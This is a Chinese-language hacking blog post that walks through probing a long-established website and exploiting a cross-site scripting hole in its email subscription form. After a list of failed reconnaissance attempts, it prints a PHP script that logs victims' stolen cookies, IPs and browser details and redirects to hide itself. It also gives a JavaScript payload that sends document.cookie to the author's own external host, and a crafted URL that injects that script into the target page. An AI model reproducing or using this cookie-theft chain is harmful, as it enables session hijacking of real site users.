0x01目标很难
 
Seo的pr7啊1999年建立的啊！真xx
 






瞧这个架势。
使用旁注 c段对我来说都是浮云！

0x02思路
1. google找注入点
        探测开发语言
            site:xxx.com filetype:jsp
            site:xxxx.com filetype:pl
                                    （aspx \asp \php）

  发现上面有pl和jsp
      Jsp注入？失败 那么久的大站就算有注入点 也不是and 1=1 and 1=2可以测试出来的
   或者是xor 1=2 xor 1=4可以找得到的
      注入点之路失败
2. 敏感目录穷举法
国外网站目录跟国内区别很多。收录有国内的社工目录。对国外没用。
扫描敏感之路失败
3. 使用渗透软件进行扫描（IBM appscan \burpsuite \JSky\zap\Acunetix）
网站目录和文件太多。软件直接卡死。。（电脑配置不行？？？？）
自动化漏洞扫描之路失败
4. Nmap扫描端口
        80端口。443端口
       失败
5. X-scan扫漏洞
带有最新漏洞脚本库的x-scan有好几百mb看起来挺牛x的但是还是没征服它
 漏洞扫描失败（自身对扫描系统漏洞这块也不是很在行）
6. 检测网站程序开源或者自己开发（开源可去oday公布平台找找poc或者exp）
检测得出结果自己开发的程序
Apache http平台
7. 弱口令扫描
我不相信这个能成功。所以它确实没成功！
8. Xss或者csrf
可利用不是非常好，但是也是唯一找到的漏洞了！
9. 强大的社工
        Hello！我懂。其他的。。我就不会了！
0x03切入跨站手法

  漏洞明细
 



 
Ps:注意几点。是邮箱订阅系统。
所以需要有检测@，但是没有检测和过滤其他字符。
所以导致了xss跨站漏洞。
能力有限。不然的话应该，还可以csrf或者是xsrf之类然后扩展wrom

能力有限只能自己写个获取cookies的脚本 使用php语言！
Test.php
Code:
<?php
$cookie = $_GET['cookie']; //以GET方式获取cookie变量值
$ip = $_SERVER['REMOTE_ADDR'];//远程主机IP地址
$time=date('Y-m-d g:i:s'); //以“年-月-日 时：分：秒”的格式显示时间
$referer = $_SERVER['HTTP_REFERER'];//链接来源
$agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型
$fp = fopen('cookie.txt', 'a'); //打开cookie.txt，若不存在则创建它
fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //写入文件
fclose($fp); //关闭文件
header("Location: https://www.2cto.com /cgi-bin/storeEmail.pl?email=xsight0@gmail.com"); //将网页重定向，增强隐蔽性
?>

照顾菜鸟看不懂代码。所以也把代码的意思给写清楚了
Xss.js
Code:
document.writeln("<script>document.location = \'http:\/\/www.54rk.cn\/test.php?cookie=\' + document.cookie;<\/script>")

构造url：
https://www.2cto.com /cgi-bin/storeEmail.pl?email=1@126.com<script%20src="http://www.54rk.cn/xss.js"></script>

黄底要注意。

测试打开
 

获取成功。

0x04社工强大
 
主要内容是想请教客服，我对该网站很有兴趣。想订阅该网站内容。是不是这样做。

0x04结尾
不要认为网站排名高。或者pr高的网站就没有漏洞。如果第一步信心你都没做到的话。那么你没必要说什么坚持和努力。也许你连脚本小子都做不到
 还有更好的办法。如果谁知道的话请联系我xsight0@gmail.com 下次我请你喝酒！
By:xsight0  Blog：www.54rk.cn